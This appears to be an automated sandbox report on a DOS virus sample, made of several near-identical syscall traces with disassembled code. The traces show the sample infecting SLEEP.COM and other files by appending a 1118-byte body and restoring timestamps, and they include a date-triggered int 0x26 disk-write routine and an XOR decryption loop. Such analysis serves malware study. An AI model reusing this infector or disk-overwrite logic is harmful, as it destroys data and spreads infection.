Sample viewer

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.

GIF

Syscalls:

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:32.387558646Z	42	PC: 12a5a | Get date 0x12a5a: cmp dl, 2 0x12a5d: je 0x12a61 0x12a5f: jmp 0x12a7e 0x12a61: cli 0x12a62: mov ah, 2 0x12a64: cdq 0x12a65: mov cx, 0x100 0x12a68: int 0x26 0x12a6a: jmp 0x12a6c 0x12a6c: cli 0x12a6d: mov al, 3 0x12a6f: mov cx, 0x2bc 0x12a72: mov dx, 0 0x12a75: mov ds, word ptr [di + 0x63] 0x12a78: mov bx, word ptr [di + 0x37] 0x12a7b: call 0x22a61 0x12a7e: ret 0x12a7f: lodsb al, byte ptr [si] 0x12a80: xor al, ah 0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:32.394788707Z	71	PC: 12b46 | Get current directory
2018-12-25T12:39:32.397875856Z	59	PC: 12b51 | Change current directory
2018-12-25T12:39:32.402112859Z	26	PC: 12c04 | Set disk transfer address
2018-12-25T12:39:32.403203971Z	78	PC: 12c12 | Find first file
2018-12-25T12:39:32.409804162Z	61	PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:32.4167724Z	63	PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:32.423661489Z	44	PC: 12c88 | Get time 0x12c88: add dl, dh 0x12c8a: je 0x12c84 0x12c8c: mov si, 0x115 0x12c8f: add si, word ptr [0x106] 0x12c93: mov byte ptr [si], dl 0x12c95: mov ax, 0x4301 0x12c98: xor cx, cx 0x12c9a: mov dx, si 0x12c9c: add dx, 0xc7 0x12ca0: int 0x21 0x12ca2: mov ah, 0x3e 0x12ca4: int 0x21 0x12ca6: mov ax, 0x3d02 0x12ca9: int 0x21 0x12cab: jb 0x12c5e 0x12cad: mov di, dx 0x12caf: add di, 0x63 0x12cb2: stosw word ptr es:[di], ax 0x12cb3: xchg ax, bx 0x12cb4: mov ah, 0x40
2018-12-25T12:39:32.426340681Z	67	PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:33.375635378Z	62	PC: 12ca6 | Close file
2018-12-25T12:39:33.377228769Z	61	PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.385621262Z	64	PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:33.393627889Z	64	PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.397056464Z	64	PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.401716971Z	66	PC: 12cee | Move file pointer
2018-12-25T12:39:33.403291367Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.406063293Z	64	PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:33.591854007Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.594392076Z	87	PC: 12d07 | Get or set file date and time
2018-12-25T12:39:33.596323946Z	62	PC: 12d0b | Close file
2018-12-25T12:39:33.617165222Z	67	PC: 12d1c | Get or set file attributes
2018-12-25T12:39:33.633175074Z	79	PC: 12c25 | Find next file
2018-12-25T12:39:33.63634849Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:33.643772046Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:33.651565139Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:33.653929771Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:33.671606542Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:33.674626763Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:33.682079558Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:33.685367175Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:33.68875668Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:33.690640341Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:33.69214284Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.694855482Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:33.707574115Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.709742865Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:33.71977368Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:33.731652583Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:33.742581089Z	79	PC: 12c25 | Find next file (See above)
2018-12-25T12:39:33.746051903Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:33.753711136Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:33.761920929Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:33.765094237Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:33.778313055Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:33.78107348Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:33.789000416Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:33.793032673Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:33.795908996Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:33.798774091Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:33.800995151Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.803458012Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:33.813238453Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.816679333Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:33.819414896Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:33.828434557Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:33.84020446Z	42	PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606 0x12b70: je 0x12b75 0x12b72: jmp 0x12d8c 0x12b75: jmp 0x12d21 0x12b78: and ah, bh 0x12b7a: movsw word ptr es:[di], word ptr [si] 0x12b7b: mov ax, 0x5c4c 0x12b7e: add word ptr [di], ax 0x12b80: add byte ptr [di - 0x75], dl 0x12b83: in al, dx 0x12b84: sub sp, 0x2c 0x12b87: push si 0x12b88: jmp 0x12bf9 0x12b8a: mov ah, 0x1a 0x12b8c: lea dx, word ptr [bp - 0x2c] 0x12b8f: int 0x21 0x12b91: mov ah, 0x4e 0x12b93: mov cx, 0x10 0x12b96: mov dx, 0x1b5 0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:33.843682521Z	59	PC: 12d97 | Change current directory
2018-12-25T12:39:33.84818401Z	59	PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:33.186120247Z	42	PC: 12a5a | Get date 0x12a5a: cmp dl, 2 0x12a5d: je 0x12a61 0x12a5f: jmp 0x12a7e 0x12a61: cli 0x12a62: mov ah, 2 0x12a64: cdq 0x12a65: mov cx, 0x100 0x12a68: int 0x26 0x12a6a: jmp 0x12a6c 0x12a6c: cli 0x12a6d: mov al, 3 0x12a6f: mov cx, 0x2bc 0x12a72: mov dx, 0 0x12a75: mov ds, word ptr [di + 0x63] 0x12a78: mov bx, word ptr [di + 0x37] 0x12a7b: call 0x22a61 0x12a7e: ret 0x12a7f: lodsb al, byte ptr [si] 0x12a80: xor al, ah 0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:33.189066842Z	71	PC: 12b46 | Get current directory
2018-12-25T12:39:33.192003603Z	59	PC: 12b51 | Change current directory
2018-12-25T12:39:33.19603326Z	26	PC: 12c04 | Set disk transfer address
2018-12-25T12:39:33.198065191Z	78	PC: 12c12 | Find first file
2018-12-25T12:39:33.204017897Z	61	PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.210503599Z	63	PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:33.217669848Z	44	PC: 12c88 | Get time 0x12c88: add dl, dh 0x12c8a: je 0x12c84 0x12c8c: mov si, 0x115 0x12c8f: add si, word ptr [0x106] 0x12c93: mov byte ptr [si], dl 0x12c95: mov ax, 0x4301 0x12c98: xor cx, cx 0x12c9a: mov dx, si 0x12c9c: add dx, 0xc7 0x12ca0: int 0x21 0x12ca2: mov ah, 0x3e 0x12ca4: int 0x21 0x12ca6: mov ax, 0x3d02 0x12ca9: int 0x21 0x12cab: jb 0x12c5e 0x12cad: mov di, dx 0x12caf: add di, 0x63 0x12cb2: stosw word ptr es:[di], ax 0x12cb3: xchg ax, bx 0x12cb4: mov ah, 0x40
2018-12-25T12:39:33.220161461Z	67	PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:33.838813657Z	62	PC: 12ca6 | Close file
2018-12-25T12:39:33.840748107Z	61	PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.852985555Z	64	PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:33.865207713Z	64	PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.868149727Z	64	PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.87161872Z	66	PC: 12cee | Move file pointer
2018-12-25T12:39:33.872963043Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.875140216Z	64	PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:33.902781159Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.905281608Z	87	PC: 12d07 | Get or set file date and time
2018-12-25T12:39:33.906822506Z	62	PC: 12d0b | Close file
2018-12-25T12:39:33.915450013Z	67	PC: 12d1c | Get or set file attributes
2018-12-25T12:39:33.922361149Z	79	PC: 12c25 | Find next file
2018-12-25T12:39:33.924526948Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:33.929133026Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:33.933924218Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:33.935638403Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:33.94317348Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:33.946366634Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:33.953275238Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:33.956912906Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:33.959637127Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:33.96233446Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:33.964677303Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.967346396Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:33.978673802Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.991320666Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:33.994337752Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.002505193Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.013634568Z	79	PC: 12c25 | Find next file (See above)
2018-12-25T12:39:34.023265365Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.02990689Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.036196031Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.038993651Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:34.050487227Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.052467636Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:34.060027308Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.062993737Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.0654043Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.068374949Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.069718661Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.072489851Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.084850614Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.087481391Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.089155882Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.10411338Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.115379362Z	42	PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606 0x12b70: je 0x12b75 0x12b72: jmp 0x12d8c 0x12b75: jmp 0x12d21 0x12b78: and ah, bh 0x12b7a: movsw word ptr es:[di], word ptr [si] 0x12b7b: mov ax, 0x5c4c 0x12b7e: add word ptr [di], ax 0x12b80: add byte ptr [di - 0x75], dl 0x12b83: in al, dx 0x12b84: sub sp, 0x2c 0x12b87: push si 0x12b88: jmp 0x12bf9 0x12b8a: mov ah, 0x1a 0x12b8c: lea dx, word ptr [bp - 0x2c] 0x12b8f: int 0x21 0x12b91: mov ah, 0x4e 0x12b93: mov cx, 0x10 0x12b96: mov dx, 0x1b5 0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:34.117912915Z	59	PC: 12d97 | Change current directory
2018-12-25T12:39:34.123174767Z	59	PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:33.559854456Z	42	PC: 12a5a | Get date 0x12a5a: cmp dl, 2 0x12a5d: je 0x12a61 0x12a5f: jmp 0x12a7e 0x12a61: cli 0x12a62: mov ah, 2 0x12a64: cdq 0x12a65: mov cx, 0x100 0x12a68: int 0x26 0x12a6a: jmp 0x12a6c 0x12a6c: cli 0x12a6d: mov al, 3 0x12a6f: mov cx, 0x2bc 0x12a72: mov dx, 0 0x12a75: mov ds, word ptr [di + 0x63] 0x12a78: mov bx, word ptr [di + 0x37] 0x12a7b: call 0x22a61 0x12a7e: ret 0x12a7f: lodsb al, byte ptr [si] 0x12a80: xor al, ah 0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:33.563553568Z	71	PC: 12b46 | Get current directory
2018-12-25T12:39:33.566813048Z	59	PC: 12b51 | Change current directory
2018-12-25T12:39:33.571734392Z	26	PC: 12c04 | Set disk transfer address
2018-12-25T12:39:33.573482765Z	78	PC: 12c12 | Find first file
2018-12-25T12:39:33.594830922Z	61	PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.608447263Z	63	PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:33.615704318Z	44	PC: 12c88 | Get time 0x12c88: add dl, dh 0x12c8a: je 0x12c84 0x12c8c: mov si, 0x115 0x12c8f: add si, word ptr [0x106] 0x12c93: mov byte ptr [si], dl 0x12c95: mov ax, 0x4301 0x12c98: xor cx, cx 0x12c9a: mov dx, si 0x12c9c: add dx, 0xc7 0x12ca0: int 0x21 0x12ca2: mov ah, 0x3e 0x12ca4: int 0x21 0x12ca6: mov ax, 0x3d02 0x12ca9: int 0x21 0x12cab: jb 0x12c5e 0x12cad: mov di, dx 0x12caf: add di, 0x63 0x12cb2: stosw word ptr es:[di], ax 0x12cb3: xchg ax, bx 0x12cb4: mov ah, 0x40
2018-12-25T12:39:33.619279468Z	67	PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:33.732240892Z	62	PC: 12ca6 | Close file
2018-12-25T12:39:33.734682249Z	61	PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.742785373Z	64	PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:33.745929747Z	64	PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.748929016Z	64	PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.752514498Z	66	PC: 12cee | Move file pointer
2018-12-25T12:39:33.753956071Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.756549181Z	64	PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:33.766962277Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.769666847Z	87	PC: 12d07 | Get or set file date and time
2018-12-25T12:39:33.771602658Z	62	PC: 12d0b | Close file
2018-12-25T12:39:33.781357942Z	67	PC: 12d1c | Get or set file attributes
2018-12-25T12:39:33.791165777Z	79	PC: 12c25 | Find next file
2018-12-25T12:39:33.794033225Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:33.798634173Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:33.803663921Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:33.805657196Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:33.817276815Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:33.820192874Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:33.828267577Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:33.831213973Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:33.835368638Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:33.838777783Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:33.84168177Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.845114955Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:33.852078229Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.854834784Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:33.857558709Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:33.866746389Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:33.880108253Z	79	PC: 12c25 | Find next file (See above)
2018-12-25T12:39:33.883634614Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:33.891277238Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:33.898402197Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:33.900840753Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:33.912432591Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:33.914229379Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:33.921449267Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:33.924523232Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:33.927372402Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:33.930211136Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:33.93203345Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.934320188Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:33.943477045Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.946661278Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:33.948704233Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:33.957340393Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:33.969290711Z	42	PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606 0x12b70: je 0x12b75 0x12b72: jmp 0x12d8c 0x12b75: jmp 0x12d21 0x12b78: and ah, bh 0x12b7a: movsw word ptr es:[di], word ptr [si] 0x12b7b: mov ax, 0x5c4c 0x12b7e: add word ptr [di], ax 0x12b80: add byte ptr [di - 0x75], dl 0x12b83: in al, dx 0x12b84: sub sp, 0x2c 0x12b87: push si 0x12b88: jmp 0x12bf9 0x12b8a: mov ah, 0x1a 0x12b8c: lea dx, word ptr [bp - 0x2c] 0x12b8f: int 0x21 0x12b91: mov ah, 0x4e 0x12b93: mov cx, 0x10 0x12b96: mov dx, 0x1b5 0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:33.972247624Z	59	PC: 12d97 | Change current directory
2018-12-25T12:39:33.978164939Z	59	PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:33.779393801Z	42	PC: 12a5a | Get date 0x12a5a: cmp dl, 2 0x12a5d: je 0x12a61 0x12a5f: jmp 0x12a7e 0x12a61: cli 0x12a62: mov ah, 2 0x12a64: cdq 0x12a65: mov cx, 0x100 0x12a68: int 0x26 0x12a6a: jmp 0x12a6c 0x12a6c: cli 0x12a6d: mov al, 3 0x12a6f: mov cx, 0x2bc 0x12a72: mov dx, 0 0x12a75: mov ds, word ptr [di + 0x63] 0x12a78: mov bx, word ptr [di + 0x37] 0x12a7b: call 0x22a61 0x12a7e: ret 0x12a7f: lodsb al, byte ptr [si] 0x12a80: xor al, ah 0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:33.782790124Z	71	PC: 12b46 | Get current directory
2018-12-25T12:39:33.785851369Z	59	PC: 12b51 | Change current directory
2018-12-25T12:39:33.790690801Z	26	PC: 12c04 | Set disk transfer address
2018-12-25T12:39:33.793593233Z	78	PC: 12c12 | Find first file
2018-12-25T12:39:33.800836807Z	61	PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.80853583Z	63	PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:33.816573647Z	44	PC: 12c88 | Get time 0x12c88: add dl, dh 0x12c8a: je 0x12c84 0x12c8c: mov si, 0x115 0x12c8f: add si, word ptr [0x106] 0x12c93: mov byte ptr [si], dl 0x12c95: mov ax, 0x4301 0x12c98: xor cx, cx 0x12c9a: mov dx, si 0x12c9c: add dx, 0xc7 0x12ca0: int 0x21 0x12ca2: mov ah, 0x3e 0x12ca4: int 0x21 0x12ca6: mov ax, 0x3d02 0x12ca9: int 0x21 0x12cab: jb 0x12c5e 0x12cad: mov di, dx 0x12caf: add di, 0x63 0x12cb2: stosw word ptr es:[di], ax 0x12cb3: xchg ax, bx 0x12cb4: mov ah, 0x40
2018-12-25T12:39:33.819670537Z	67	PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:33.839917806Z	62	PC: 12ca6 | Close file
2018-12-25T12:39:33.842351934Z	61	PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.858820733Z	64	PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:33.866659444Z	64	PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.870067178Z	64	PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.87440719Z	66	PC: 12cee | Move file pointer
2018-12-25T12:39:33.875708547Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.878054128Z	64	PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:33.887680464Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.889406629Z	87	PC: 12d07 | Get or set file date and time
2018-12-25T12:39:33.891007334Z	62	PC: 12d0b | Close file
2018-12-25T12:39:33.89960948Z	67	PC: 12d1c | Get or set file attributes
2018-12-25T12:39:33.910917244Z	79	PC: 12c25 | Find next file
2018-12-25T12:39:33.913492524Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:33.919397959Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:33.927189828Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:33.929506354Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:33.937863457Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:33.940311684Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:33.947676412Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:33.951451937Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:33.955220358Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:33.95777129Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:33.959231752Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.962526446Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:33.97168305Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.974470098Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:33.976692128Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:33.986507381Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:33.997934127Z	79	PC: 12c25 | Find next file (See above)
2018-12-25T12:39:34.00160097Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.008985326Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.016260064Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.019029468Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:34.030573412Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.032951431Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:34.040645801Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.045897176Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.048971413Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.051996451Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.055816074Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.058233874Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.067936281Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.077438415Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.079229899Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.093688375Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.106663634Z	42	PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606 0x12b70: je 0x12b75 0x12b72: jmp 0x12d8c 0x12b75: jmp 0x12d21 0x12b78: and ah, bh 0x12b7a: movsw word ptr es:[di], word ptr [si] 0x12b7b: mov ax, 0x5c4c 0x12b7e: add word ptr [di], ax 0x12b80: add byte ptr [di - 0x75], dl 0x12b83: in al, dx 0x12b84: sub sp, 0x2c 0x12b87: push si 0x12b88: jmp 0x12bf9 0x12b8a: mov ah, 0x1a 0x12b8c: lea dx, word ptr [bp - 0x2c] 0x12b8f: int 0x21 0x12b91: mov ah, 0x4e 0x12b93: mov cx, 0x10 0x12b96: mov dx, 0x1b5 0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:34.109601282Z	59	PC: 12d97 | Change current directory
2018-12-25T12:39:34.114619293Z	59	PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:33.827432169Z	42	PC: 12a5a | Get date 0x12a5a: cmp dl, 2 0x12a5d: je 0x12a61 0x12a5f: jmp 0x12a7e 0x12a61: cli 0x12a62: mov ah, 2 0x12a64: cdq 0x12a65: mov cx, 0x100 0x12a68: int 0x26 0x12a6a: jmp 0x12a6c 0x12a6c: cli 0x12a6d: mov al, 3 0x12a6f: mov cx, 0x2bc 0x12a72: mov dx, 0 0x12a75: mov ds, word ptr [di + 0x63] 0x12a78: mov bx, word ptr [di + 0x37] 0x12a7b: call 0x22a61 0x12a7e: ret 0x12a7f: lodsb al, byte ptr [si] 0x12a80: xor al, ah 0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:33.831364796Z	71	PC: 12b46 | Get current directory
2018-12-25T12:39:33.835146665Z	59	PC: 12b51 | Change current directory
2018-12-25T12:39:33.838028024Z	26	PC: 12c04 | Set disk transfer address
2018-12-25T12:39:33.839512154Z	78	PC: 12c12 | Find first file
2018-12-25T12:39:33.843932135Z	61	PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.849988708Z	63	PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:33.855350394Z	44	PC: 12c88 | Get time 0x12c88: add dl, dh 0x12c8a: je 0x12c84 0x12c8c: mov si, 0x115 0x12c8f: add si, word ptr [0x106] 0x12c93: mov byte ptr [si], dl 0x12c95: mov ax, 0x4301 0x12c98: xor cx, cx 0x12c9a: mov dx, si 0x12c9c: add dx, 0xc7 0x12ca0: int 0x21 0x12ca2: mov ah, 0x3e 0x12ca4: int 0x21 0x12ca6: mov ax, 0x3d02 0x12ca9: int 0x21 0x12cab: jb 0x12c5e 0x12cad: mov di, dx 0x12caf: add di, 0x63 0x12cb2: stosw word ptr es:[di], ax 0x12cb3: xchg ax, bx 0x12cb4: mov ah, 0x40
2018-12-25T12:39:33.860305806Z	67	PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:33.880684901Z	62	PC: 12ca6 | Close file
2018-12-25T12:39:33.883112758Z	61	PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.897871741Z	64	PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
